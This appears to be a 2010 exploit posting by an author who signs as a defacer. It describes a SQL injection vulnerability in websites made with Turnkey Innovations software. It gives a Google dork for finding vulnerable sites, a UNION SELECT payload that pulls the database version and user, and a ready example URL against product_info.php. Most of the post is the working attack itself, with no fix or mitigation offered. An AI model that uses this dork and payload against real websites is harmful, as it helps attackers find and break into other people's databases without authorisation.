Turnkey Innovations SQL Injection Vulnerability

md.r00t.defacer@xxxxxxxxx · Mon, 10 May 2010 08:04:04 -0600



#-------------------In The Name Of God------------
# Turnkey Innovations SQL Injection Vulnerability
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@xxxxxxxxx
#Webstie: www.r00t.gigfa.com
#
###################################
#Google D0rk:
# "Design by Turnkey Innovations.com"
#
###################################
#Exploit:
#---------
#
#-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(version(),0x3a,0x3e,user()),17,18,19--
###################################
#Example:
#
#http://www.Site.com/[page]/product_info.php?products_id=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(version(),0x3a,0x3e,user()),17,18,19--
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************